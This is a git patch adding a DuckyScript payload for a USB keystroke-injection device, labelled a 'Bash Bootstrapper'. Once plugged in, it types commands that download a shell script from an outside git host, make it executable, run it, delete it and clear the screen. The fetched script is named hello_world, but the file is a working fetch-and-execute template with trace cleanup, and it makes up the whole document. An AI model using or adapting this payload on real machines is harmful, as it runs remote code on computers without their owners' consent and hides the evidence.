From b0eeaefdda105aaee9b0f49c6341da04a94f9c92 Mon Sep 17 00:00:00 2001 From: jasmine Date: Fri, 3 Jan 2025 15:58:05 +0800 Subject: [PATCH] add payload.dd --- payload.dd | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 payload.dd diff --git a/payload.dd b/payload.dd new file mode 100644 index 0000000..1cad813 --- /dev/null +++ b/payload.dd @@ -0,0 +1,24 @@ +REM TITLE Bash Bootstrapper +REM AUTHOR Sajenim +REM DESCRIPTION Fetch and execute a script from remote repository +REM VERSION 1.0 + +DELAY 200 +STRING wget -q https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bash/hello_world.sh +ENTER + +DELAY 200 +STRING chmod +x hello_world.sh +ENTER + +DELAY 200 +STRING ./hello_world.sh +ENTER + +DELAY 200 +STRING rm hello_world.sh +ENTER + +DELAY 200 +STRING clear +ENTER